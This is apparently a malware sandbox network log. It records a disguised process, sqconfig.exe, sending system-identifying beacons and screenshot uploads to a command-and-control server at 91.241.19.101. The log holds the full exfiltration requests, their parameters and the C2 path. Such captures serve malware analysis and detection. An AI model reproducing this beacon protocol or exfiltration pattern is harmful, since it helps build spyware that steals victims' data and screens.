                                                                  Sep 30, 2021 23:53:39.402468920 CEST17575OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d
                                                                  Data Ascii: JFIF``C $.' ",#(7),01444'9=82<.342C2!!22222222222222222222222222222222222222222222222222"}!1A
                                                                  Sep 30, 2021 23:53:39.402601957 CEST17577OUTData Raw: 10 9e 74 85 f6 e7 ae 32 78 ae f7 e1 91 b7 b5 2b a8 5d 78 a2 2b 18 62 b8 70 da 6c b3 84 59 b3 18 01 c8 2e 07 53 fd d3 f7 3f 2c 96 e2 a4 d3 ad 75 b1 6b 46 b7 b3 5d 73 4f 2b f0 df 51 b4 61 73 19 17 0f 71 70 44 27 70 f9 c8 2b 82 07 5e 78 e2 bc ff 00
                                                                  Data Ascii: t2x+]x+bplY.S?,ukF]sO+QasqpD'p+^xX*:>;MFo+q2q -um}gx[n"pq=xH_.X4Ti6W.b*^`QK%QHNbSW|:c6Eye'\<$4_KK
                                                                  Sep 30, 2021 23:53:39.534523010 CEST17580OUTData Raw: 1b 8a 31 4e a3 14 ec 2b 8d c7 b5 18 a7 62 8a 02 e3 71 46 29 f4 98 a2 c1 71 98 a4 c5 48 45 26 3d a9 58 77 19 8a 50 29 f8 a3 14 58 2e 37 14 84 53 f1 46 29 d8 2e 33 14 62 9f 8a 4a 56 0b 8d c5 26 29 f8 a3 14 58 2e 33 14 60 53 b1 46 28 b0 5c 6d 25 29
                                                                  Data Ascii: 1N+bqF)qHE&=XwP)X.7SF).3bJV&)X.3`SF(\m%)b%bf(:E\mKIV*B)R7Z(/4AqbC@&)QN"c{F(a@ )qKn(4ZJTbh#EI'Sk^/JQ[-NH
                                                                  Sep 30, 2021 23:53:39.534848928 CEST17591OUTData Raw: 06 81 71 a3 e8 d6 96 b1 69 90 5a ba da 79 9a 8b de 5a 19 60 97 20 4a 5e 02 82 66 f9 b7 02 19 d9 30 41 e0 0e 24 d4 24 d2 24 bf 8d ec a2 d0 61 d5 8e 95 27 95 1c f7 16 72 db 89 c4 ff 00 c6 51 52 df 7f 95 9c 65 71 d3 39 20 1a f3 8f 29 7d 28 f2 97 fb
                                                                  Data Ascii: qiZyZ` J^f0A$$$a'rQReq9 )}()U=KGcQXbeG!`630AGwgi.$X<eFZU &s<w_Pt*.:-g{H1$m|(Y~c`9:kiZjxKa
                                                                  Sep 30, 2021 23:53:39.534965992 CEST17604OUTData Raw: e5 0e 64 44 45 2e 2a 4d b4 6d a7 ca c3 98 8f 14 6d 07 b5 49 8a 36 d2 e5 0e 62 23 12 1f e1 a6 1b 74 3e a2 ac 6d a3 14 72 21 a9 b4 55 fb 37 a1 a6 fd 9d c7 4a b9 b4 d2 81 4b d9 a6 35 51 94 3c b6 1d 41 a4 e6 b4 71 4d 2a 0f 51 fa 52 f6 5d 86 aa 94 28
                                                                  Data Ascii: dDE.*MmmI6b#t>mr!U7JK5Q<AqM*QR](WL(}EOc8T"mtI!EN18i9.())bRS\P2@pKbbNbS)jMd)i1iZHJ)Mu2GZJ)::SEJ)
                                                                  Sep 30, 2021 23:53:39.666501999 CEST17610OUTData Raw: 00 15 1c 78 1a d3 de 4a f2 e7 3f 37 e3 5c 78 2f e1 4b d5 9f 47 5f 59 c7 d1 1e cb 37 1e 0f d2 3f dc 1f ca b1 cf 5a d8 b8 ff 00 91 4b 47 ff 00 ae 63 f9 56 3f 7a e4 c3 7c 2f d5 9a 63 3e 35 e8 80 7b d2 e0 51 4b 5d 27 1a 10 0a 7e 29 b4 a2 91 48 70 14
                                                                  Data Ascii: xJ?7\x/KG_Y7?ZKGcV?z|/c>5{QK]'~)Hpp)JK-N)sRhQMIxT2tT!Slhi1J%"Pi:phk~)?"=k~((|dUm#Cm<Bfo1}Xc9iZh7
                                                                  Sep 30, 2021 23:53:39.666583061 CEST17629OUTData Raw: b2 8a d8 b8 60 6a b6 6a f8 e9 80 f0 be 8d fe e9 af 3a 8d bf 7a 9f ef 0a eb fc 75 e2 3d 2b 56 b4 b1 b5 d2 8b 98 ad c1 fb cb 8a e1 d6 52 92 23 76 07 26 b9 30 ed aa 56 6b 5d 4f 6e 70 f7 d7 5d 8f 72 f1 11 db 67 a6 7f d7 01 fc 85 73 e4 e6 96 7f 88 5e
                                                                  Data Ascii: `jj:zu=+VR#v&0Vk]Onp]rgs^Kk*17!-7N.JG8Xb8oxk7Qv7?+i:GwS]zI\3?(?jNP):);CsR3r
                                                                  Sep 30, 2021 23:53:39.666817904 CEST17634OUTData Raw: e9 ec cc bf b4 78 6f c0 da 7c 91 da 14 69 e4 39 10 a3 ef 96 66 ec 3d 87 e9 51 69 5a 5d dd 9f 86 35 ab fd 44 6d bf d4 63 96 79 53 fb 83 61 da bf 86 4f e7 8a d8 d3 7c 2d a2 69 13 79 d6 5a 74 51 ca 3a 3b 12 ec 3e 85 89 23 f0 ab 5a d7 fc 80 75 1f fa
                                                                  Data Ascii: xo|i9f=QiZ]5DmcySaO|-iyZtQ:;>#Zu@4UvaJemR]61Z)E2B){LE.E4b0Ryt;2`Sq74&1J8L)>@KGzE\wGEE|jC15(2&i]FsIEiE6)
                                                                  Sep 30, 2021 23:53:39.666886091 CEST17639OUTData Raw: 56 89 1c 0d 2e 69 99 a5 cd 32 6c 3c 1a 75 46 0d 28 34 ee 2b 0f cd 04 e4 53 73 45 3b 85 87 76 a2 92 8c d1 71 0f cd 00 d3 73 46 69 dc 56 1f 9a 33 51 e6 97 34 5c 2c 49 9a 37 1a 8b 34 16 a7 cc 1c a3 cb 52 16 a8 c9 a4 2d 52 e4 35 11 c5 e9 bb e9 84 d2
                                                                  Data Ascii: V.i2l<uF(4+SsE;vqsFiV3Q4\,I74R-R5fQSW(jij"GR/40&j\QZ3IW*M&ijfi3J@M(4174bM43LBIBsHh3Km!M%!4MP+=$Y{h51V
                                                                  Sep 30, 2021 23:53:39.878966093 CEST17652INHTTP/1.1 200 OK
                                                                  Server: nginx/1.20.1
                                                                  Date: Thu, 30 Sep 2021 21:53:39 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Content-Length: 0
                                                                  Connection: keep-alive
                                                                  Sep 30, 2021 23:53:39.925827980 CEST17652OUTPOST /g7vcSfkbDs2/index.php HTTP/1.1
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Host: 91.241.19.101
                                                                  Content-Length: 82
                                                                  Cache-Control: no-cache
                                                                  Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 34 32 26 73 64 3d 37 62 37 31 37 61 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 32 38 37 35 37 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                  Data Ascii: id=152138533219&vs=2.42&sd=7b717a&os=1&bi=1&ar=1&pc=128757&un=user&dm=&av=13&lv=0
                                                                  Sep 30, 2021 23:53:40.112889051 CEST17653INHTTP/1.1 200 OK
                                                                  Server: nginx/1.20.1
                                                                  Date: Thu, 30 Sep 2021 21:53:40 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: keep-alive
                                                                  Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                  Data Ascii: 6<c><d>0


                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                  145192.168.2.34998091.241.19.10180C:\Users\user\AppData\Roaming\SQLite Distributed tools\sqconfig.exe
                                                                  TimestampkBytes transferredDirectionData
                                                                  Sep 30, 2021 23:53:39.611936092 CEST17605OUTPOST /g7vcSfkbDs2/index.php HTTP/1.1
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Host: 91.241.19.101
                                                                  Content-Length: 82
                                                                  Cache-Control: no-cache
                                                                  Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 34 32 26 73 64 3d 37 62 37 31 37 61 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 32 38 37 35 37 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                  Data Ascii: id=152138533219&vs=2.42&sd=7b717a&os=1&bi=1&ar=1&pc=128757&un=user&dm=&av=13&lv=0
                                                                  Sep 30, 2021 23:53:39.814075947 CEST17652INHTTP/1.1 200 OK
                                                                  Server: nginx/1.20.1
                                                                  Date: Thu, 30 Sep 2021 21:53:39 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: keep-alive
                                                                  Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                  Data Ascii: 6<c><d>0


                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                  146192.168.2.34998191.241.19.10180C:\Users\user\AppData\Roaming\SQLite Distributed tools\sqconfig.exe
                                                                  TimestampkBytes transferredDirectionData
                                                                  Sep 30, 2021 23:53:40.237550020 CEST17653OUTPOST /g7vcSfkbDs2/index.php?scr=1 HTTP/1.1
                                                                  Content-Type: multipart/form-data; boundary=----cb06620fdbfb5a3e502f93b69d2ed9e3
                                                                  Host: 91.241.19.101
                                                                  Content-Length: 86508
                                                                  Cache-Control: no-cache
                                                                  Sep 30, 2021 23:53:40.237843037 CEST17654OUTData Raw: 2d 2d 2d 2d 2d 2d 63 62 30 36 36 32 30 66 64 62 66 62 35 61 33 65 35 30 32 66 39 33 62 36 39 64 32 65 64 39 65 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61
                                                                  Data Ascii: ------cb06620fdbfb5a3e502f93b69d2ed9e3Content-Disposition: form-data; name="data"; filename="152138533219.jpg"Content-Type: application/octet-stream
                                                                  Sep 30, 2021 23:53:40.238214970 CEST17664OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d
                                                                  Data Ascii: JFIF``C $.' ",#(7),01444'9=82<.342C2!!22222222222222222222222222222222222222222222222222"}!1A
                                                                  Sep 30, 2021 23:53:40.238444090 CEST17666OUTData Raw: 10 9e 74 85 f6 e7 ae 32 78 ae f7 e1 91 b7 b5 2b a8 5d 78 a2 2b 18 62 b8 70 da 6c b3 84 59 b3 18 01 c8 2e 07 53 fd d3 f7 3f 2c 96 e2 a4 d3 ad 75 b1 6b 46 b7 b3 5d 73 4f 2b f0 df 51 b4 61 73 19 17 0f 71 70 44 27 70 f9 c8 2b 82 07 5e 78 e2 bc ff 00
                                                                  Data Ascii: t2x+]x+bplY.S?,ukF]sO+QasqpD'p+^xX*:>;MFo+q2q -um}gx[n"pq=xH_.X4Ti6W.b*^`QK%QHNbSW|:c6Eye'\<$4_KK
                                                                  Sep 30, 2021 23:53:40.358362913 CEST17670OUTData Raw: 1b 8a 31 4e a3 14 ec 2b 8d c7 b5 18 a7 62 8a 02 e3 71 46 29 f4 98 a2 c1 71 98 a4 c5 48 45 26 3d a9 58 77 19 8a 50 29 f8 a3 14 58 2e 37 14 84 53 f1 46 29 d8 2e 33 14 62 9f 8a 4a 56 0b 8d c5 26 29 f8 a3 14 58 2e 33 14 60 53 b1 46 28 b0 5c 6d 25 29
                                                                  Data Ascii: 1N+bqF)qHE&=XwP)X.7SF).3bJV&)X.3`SF(\m%)b%bf(:E\mKIV*B)R7Z(/4AqbC@&)QN"c{F(a@ )qKn(4ZJTbh#EI'Sk^/JQ[-NH
                                                                  Sep 30, 2021 23:53:40.358428001 CEST17678OUTData Raw: 06 81 71 a3 e8 d6 96 b1 69 90 5a ba da 79 9a 8b de 5a 19 60 97 20 4a 5e 02 82 66 f9 b7 02 19 d9 30 41 e0 0e 24 d4 24 d2 24 bf 8d ec a2 d0 61 d5 8e 95 27 95 1c f7 16 72 db 89 c4 ff 00 c6 51 52 df 7f 95 9c 65 71 d3 39 20 1a f3 8f 29 7d 28 f2 97 fb
                                                                  Data Ascii: qiZyZ` J^f0A$$$a'rQReq9 )}()U=KGcQXbeG!`630AGwgi.$X<eFZU &s<w_Pt*.:-g{H1$m|(Y~c`9:kiZjxKa
                                                                  Sep 30, 2021 23:53:40.358457088 CEST17681OUTData Raw: 59 c1 05 8e 14 12 7b 9c 9c 0a c5 46 aa 76 4f bf e6 d9 ab 95 26 9b 7f d6 df f0 4a 32 f9 0b 73 32 41 2f 9d 0a c8 cb 1c bb 4a ef 50 78 6c 1e 46 47 38 a6 e1 69 8f 2c 93 48 f2 cb 23 49 2b b1 67 77 39 66 27 92 49 ee 68 cd 76 47 64 99 c9 2b 36 da 1d e5
                                                                  Data Ascii: Y{FvO&J2s2A/JPxlFG8i,H#I+gw9f'IhvGd+6HbhNy>y&qh3jBTg;YKjOjp{QJ*;O%OCG#+Rg.VXRvwC(m4;RJQIJ(h()iQK@E.(4XBQK1@RB
                                                                  Sep 30, 2021 23:53:40.358824968 CEST17683OUTData Raw: e5 0e 64 44 45 2e 2a 4d b4 6d a7 ca c3 98 8f 14 6d 07 b5 49 8a 36 d2 e5 0e 62 23 12 1f e1 a6 1b 74 3e a2 ac 6d a3 14 72 21 a9 b4 55 fb 37 a1 a6 fd 9d c7 4a b9 b4 d2 81 4b d9 a6 35 51 94 3c b6 1d 41 a4 e6 b4 71 4d 2a 0f 51 fa 52 f6 5d 86 aa 94 28
                                                                  Data Ascii: dDE.*MmmI6b#t>mr!U7JK5Q<AqM*QR](WL(}EOc8T"mtI!EN18i9.())bRS\P2@pKbbNbS)jMd)i1iZHJ)Mu2GZJ)::SEJ)
                                                                  Sep 30, 2021 23:53:40.358926058 CEST17693OUTData Raw: 17 c7 1a a2 6b d7 6a 8a 00 55 52 00 00 76 1c 52 ff 00 c2 c6 f1 8f fd 0c 17 bf f7 d0 ff 00 0a e4 85 1a b0 77 8c ac fd 59 d5 3a b4 a6 ad 25 74 7d 29 a6 f8 5b 44 d2 26 f3 ac b4 e8 a3 94 74 76 25 d8 7d 0b 12 47 e1 56 b5 af f9 00 ea 3f f5 eb 2f fe 80
                                                                  Data Ascii: kjURvRwY:%t})[D&tv%}GV?/kX1Sdchefz1DwUh#4Q]((|$u^]+0%g8kxGZkBIoeiR &3_jZey8nTl\O\
                                                                  Sep 30, 2021 23:53:40.476110935 CEST17698OUTData Raw: 56 04 c9 43 1f 5a 78 73 eb 50 83 4e 06 a5 a3 45 26 4c ae 73 52 09 0d 40 29 d9 a8 69 1a 29 b2 c0 94 8e f5 22 dc c8 a7 87 35 54 1a 70 35 0e 08 d5 54 91 a0 9a 84 cb fc 66 ac 26 a9 28 ea 41 fa 8a c9 06 9e 0d 67 2a 51 7d 0d a3 5e 6b a9 b0 ba 9e 7e fc
                                                                  Data Ascii: VCZxsPNE&LsR@)i)"5Tp5Tf&(Ag*Q}^k~jil?*Nk'At5Xu56^M:^ [mgJzA o-D$nhU9(=S}z(5i)&uujuUBsES|;mSNi'~T}fKtTG0W
                                                                  Sep 30, 2021 23:53:40.476174116 CEST17703OUTData Raw: ef fb 90 fd 57 e6 79 ab 7c 06 d3 36 9d ba 80 2d 8e 01 85 c0 ff 00 d1 95 e5 1e 34 f0 4d ff 00 84 b5 16 8e 54 26 03 ca ba e4 8c 7a 83 dc 7f 93 5f 57 59 5d 25 f5 85 bd dc 60 84 9e 25 95 41 ea 03 00 7f ad 67 78 97 c3 f6 be 23 d2 25 b3 b8 45 2f 82 62
                                                                  Data Ascii: Wy|6-4MT&z_WY]%`%Agx#%E/br>c2=6nx*Kb$S[Gg\CjA ~H!QN*K*5eJ[h:g4U>6Z]3NVts0h,;qqY}h}i
                                                                  Sep 30, 2021 23:53:40.648515940 CEST17742INHTTP/1.1 200 OK
                                                                  Server: nginx/1.20.1
                                                                  Date: Thu, 30 Sep 2021 21:53:40 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Content-Length: 0
                                                                  Connection: keep-alive


                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                  147192.168.2.34998291.241.19.10180C:\Users\user\AppData\Roaming\SQLite Distributed tools\sqconfig.exe
                                                                  TimestampkBytes transferredDirectionData
                                                                  Sep 30, 2021 23:53:40.351134062 CEST17667OUTPOST /g7vcSfkbDs2/index.php HTTP/1.1
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Host: 91.241.19.101
                                                                  Content-Length: 82
                                                                  Cache-Control: no-cache
                                                                  Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 34 32 26 73 64 3d 37 62 37 31 37 61 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 32 38 37 35 37 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                  Data Ascii: id=152138533219&vs=2.42&sd=7b717a&os=1&bi=1&ar=1&pc=128757&un=user&dm=&av=13&lv=0
                                                                  Sep 30, 2021 23:53:40.520113945 CEST17741INHTTP/1.1 200 OK
                                                                  Server: nginx/1.20.1
                                                                  Date: Thu, 30 Sep 2021 21:53:40 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: keep-alive
                                                                  Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                  Data Ascii: 6<c><d>0


                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                  148192.168.2.34998391.241.19.10180C:\Users\user\AppData\Roaming\SQLite Distributed tools\sqconfig.exe
                                                                  TimestampkBytes transferredDirectionData
                                                                  Sep 30, 2021 23:53:40.761003017 CEST17742OUTPOST /g7vcSfkbDs2/index.php HTTP/1.1
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Host: 91.241.19.101
                                                                  Content-Length: 82
                                                                  Cache-Control: no-cache
                                                                  Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 34 32 26 73 64 3d 37 62 37 31 37 61 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 32 38 37 35 37 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                  Data Ascii: id=152138533219&vs=2.42&sd=7b717a&os=1&bi=1&ar=1&pc=128757&un=user&dm=&av=13&lv=0
                                                                  Sep 30, 2021 23:53:40.978809118 CEST17742INHTTP/1.1 200 OK
                                                                  Server: nginx/1.20.1
                                                                  Date: Thu, 30 Sep 2021 21:53:40 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: keep-alive
                                                                  Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                  Data Ascii: 6<c><d>0
                                                                  Sep 30, 2021 23:53:41.129062891 CEST17743OUTPOST /g7vcSfkbDs2/index.php?scr=1 HTTP/1.1
                                                                  Content-Type: multipart/form-data; boundary=----cb06620fdbfb5a3e502f93b69d2ed9e3
                                                                  Host: 91.241.19.101
                                                                  Content-Length: 86508
                                                                  Cache-Control: no-cache
                                                                  Sep 30, 2021 23:53:41.129259109 CEST17743OUTData Raw: 2d 2d 2d 2d 2d 2d 63 62 30 36 36 32 30 66 64 62 66 62 35 61 33 65 35 30 32 66 39 33 62 36 39 64 32 65 64 39 65 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61
                                                                  Data Ascii: ------cb06620fdbfb5a3e502f93b69d2ed9e3Content-Disposition: form-data; name="data"; filename="152138533219.jpg"Content-Type: application/octet-stream
                                                                  Sep 30, 2021 23:53:41.129581928 CEST17753OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d
                                                                  Data Ascii: JFIF``C $.' ",#(7),01444'9=82<.342C2!!22222222222222222222222222222222222222222222222222"}!1A
                                                                  Sep 30, 2021 23:53:41.129735947 CEST17756OUTData Raw: 10 9e 74 85 f6 e7 ae 32 78 ae f7 e1 91 b7 b5 2b a8 5d 78 a2 2b 18 62 b8 70 da 6c b3 84 59 b3 18 01 c8 2e 07 53 fd d3 f7 3f 2c 96 e2 a4 d3 ad 75 b1 6b 46 b7 b3 5d 73 4f 2b f0 df 51 b4 61 73 19 17 0f 71 70 44 27 70 f9 c8 2b 82 07 5e 78 e2 bc ff 00
                                                                  Data Ascii: t2x+]x+bplY.S?,ukF]sO+QasqpD'p+^xX*:>;MFo+q2q -um}gx[n"pq=xH_.X4Ti6W.b*^`QK%QHNbSW|:c6Eye'\<$4_KK
                                                                  Sep 30, 2021 23:53:41.256511927 CEST17759OUTData Raw: 1b 8a 31 4e a3 14 ec 2b 8d c7 b5 18 a7 62 8a 02 e3 71 46 29 f4 98 a2 c1 71 98 a4 c5 48 45 26 3d a9 58 77 19 8a 50 29 f8 a3 14 58 2e 37 14 84 53 f1 46 29 d8 2e 33 14 62 9f 8a 4a 56 0b 8d c5 26 29 f8 a3 14 58 2e 33 14 60 53 b1 46 28 b0 5c 6d 25 29
                                                                  Data Ascii: 1N+bqF)qHE&=XwP)X.7SF).3bJV&)X.3`SF(\m%)b%bf(:E\mKIV*B)R7Z(/4AqbC@&)QN"c{F(a@ )qKn(4ZJTbh#EI'Sk^/JQ[-NH
                                                                  Sep 30, 2021 23:53:41.256582975 CEST17777OUTData Raw: 06 81 71 a3 e8 d6 96 b1 69 90 5a ba da 79 9a 8b de 5a 19 60 97 20 4a 5e 02 82 66 f9 b7 02 19 d9 30 41 e0 0e 24 d4 24 d2 24 bf 8d ec a2 d0 61 d5 8e 95 27 95 1c f7 16 72 db 89 c4 ff 00 c6 51 52 df 7f 95 9c 65 71 d3 39 20 1a f3 8f 29 7d 28 f2 97 fb
                                                                  Data Ascii: qiZyZ` J^f0A$$$a'rQReq9 )}()U=KGcQXbeG!`630AGwgi.$X<eFZU &s<w_Pt*.:-g{H1$m|(Y~c`9:kiZjxKa
                                                                  Sep 30, 2021 23:53:41.256800890 CEST17782OUTData Raw: c7 87 18 ff 00 d3 33 5e 2f 7e df be 73 fe d1 af 3b 28 5e f4 cf 7b 39 77 f6 7e 87 a1 59 71 f0 ee 0f a8 fe 75 cc c9 5d 25 a1 c7 c3 bb 6f 73 fd 6b 97 95 c8 27 da b4 c2 2f 7a 7e ac e4 cc dd 94 3d 11 13 92 0f 06 90 4b 20 e8 e4 7e 34 84 e6 9b 5e 8d 91
                                                                  Data Ascii: 3^/~s;(^{9w~Yqu]%osk'/z~=K ~4^;NrgOXoE.Hu,i'AMkI>bq+[2wqVE~5lCT<GsMu5XO-&<Jii-iD'kg/TF5W+9+zO7:&r#
                                                                  Sep 30, 2021 23:53:41.382339954 CEST17793OUTData Raw: 00 15 1c 78 1a d3 de 4a f2 e7 3f 37 e3 5c 78 2f e1 4b d5 9f 47 5f 59 c7 d1 1e cb 37 1e 0f d2 3f dc 1f ca b1 cf 5a d8 b8 ff 00 91 4b 47 ff 00 ae 63 f9 56 3f 7a e4 c3 7c 2f d5 9a 63 3e 35 e8 80 7b d2 e0 51 4b 5d 27 1a 10 0a 7e 29 b4 a2 91 48 70 14
                                                                  Data Ascii: xJ?7\x/KG_Y7?ZKGcV?z|/c>5{QK]'~)Hpp)JK-N)sRhQMIxT2tT!Slhi1J%"Pi:phk~)?"=k~((|dUm#Cm<Bfo1}Xc9iZh7
                                                                  Sep 30, 2021 23:53:41.382383108 CEST17804OUTData Raw: 4d 14 e1 40 98 ea 29 33 4a 29 92 3a 8a 43 45 02 62 d1 45 28 a0 46 c7 87 bf e3 fd bf eb 99 aa 6d f7 db eb 56 f4 0f f8 fe 6f fa e6 6a a3 7d f6 fa 9a c2 3f c5 63 a9 fc 34 25 2d 1d a8 15 b9 ce 2d 3a 9b 4e a4 48 53 a9 05 2d 4b 10 a2 8a 4a 5a 09 0a 28
                                                                  Data Ascii: M@)3J):CEbE(FmVoj}?c4%--:NHS-KJZ(F(bG47(BV>F8I{NgnTK%?,=yKoWDY[[_;>kq{st^*t$gBfKSi4\p4
                                                                  Sep 30, 2021 23:53:41.382761002 CEST17825OUTData Raw: 5a 42 de d9 fe e4 e9 f8 9a 3e c1 93 f2 ba b7 d0 d1 cf 11 73 19 b8 cf 14 bb 6a fb 69 f2 83 f7 6a 33 68 e3 b5 57 32 60 e6 54 c5 2e 2a 73 6e e3 b1 a6 f9 44 76 a7 74 2e 64 47 b6 97 15 26 da 36 d3 15 c8 f1 4b 8a 7e 29 71 40 5c 8f 14 a0 53 b1 46 28 15
                                                                  Data Ascii: ZB>sjij3hW2`T.*snDvt.dG&6K~)q@\SF(SF).X\?ZbROR<k3^n)1g_GRA>u|(]XxE^'_F"l~19,<foK:Q_H/7MM
                                                                  Sep 30, 2021 23:53:41.382798910 CEST17828OUTData Raw: e3 59 b5 da 78 0f 66 db e0 71 b8 ec fc b9 a9 a8 da 8b b1 95 5a ea 84 7d a4 95 d2 b6 9f 33 ae d3 bc 2b 66 b1 f9 56 7a 60 9f 68 f9 98 c7 bc fd 49 aa 5a c7 81 56 f6 37 58 74 f7 b6 ba 5e 8c 91 11 f8 11 5d 78 f3 4e 85 64 20 dc d0 0d de 66 df f9 e9 93
                                                                  Data Ascii: YxfqZ}3+fVz`hIZV7Xt^]xNd fu'?!V0X;{tjK?c[ilC1GSQWW+8sl]k5JQ<N=Z%/jJ(J)h)i(aKE%Pi(i)i(h
                                                                  Sep 30, 2021 23:53:41.681092978 CEST17831INHTTP/1.1 200 OK
                                                                  Server: nginx/1.20.1
                                                                  Date: Thu, 30 Sep 2021 21:53:41 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Content-Length: 0
                                                                  Connection: keep-alive
                                                                  Sep 30, 2021 23:53:41.741372108 CEST17831OUTPOST /g7vcSfkbDs2/index.php HTTP/1.1
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Host: 91.241.19.101
                                                                  Content-Length: 82
                                                                  Cache-Control: no-cache
                                                                  Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 34 32 26 73 64 3d 37 62 37 31 37 61 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 32 38 37 35 37 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                  Data Ascii: id=152138533219&vs=2.42&sd=7b717a&os=1&bi=1&ar=1&pc=128757&un=user&dm=&av=13&lv=0
                                                                  Sep 30, 2021 23:53:41.932846069 CEST17831INHTTP/1.1 200 OK
                                                                  Server: nginx/1.20.1
                                                                  Date: Thu, 30 Sep 2021 21:53:41 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: keep-alive
                                                                  Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                  Data Ascii: 6<c><d>0


                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                  149192.168.2.34998491.241.19.10180C:\Users\user\AppData\Roaming\SQLite Distributed tools\sqconfig.exe
                                                                  TimestampkBytes transferredDirectionData
                                                                  Sep 30, 2021 23:53:41.452843904 CEST17829OUTPOST /g7vcSfkbDs2/index.php HTTP/1.1
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Host: 91.241.19.101
                                                                  Content-Length: 82
                                                                  Cache-Control: no-cache
                                                                  Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 34 32 26 73 64 3d 37 62 37 31 37 61 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 32 38 37 35 37 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                  Data Ascii: id=152138533219&vs=2.42&sd=7b717a&os=1&bi=1&ar=1&pc=128757&un=user&dm=&av=13&lv=0
                                                                  Sep 30, 2021 23:53:41.624922991 CEST17830INHTTP/1.1 200 OK
                                                                  Server: nginx/1.20.1
                                                                  Date: Thu, 30 Sep 2021 21:53:41 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: keep-alive
                                                                  Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                  Data Ascii: 6<c><d>0


                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
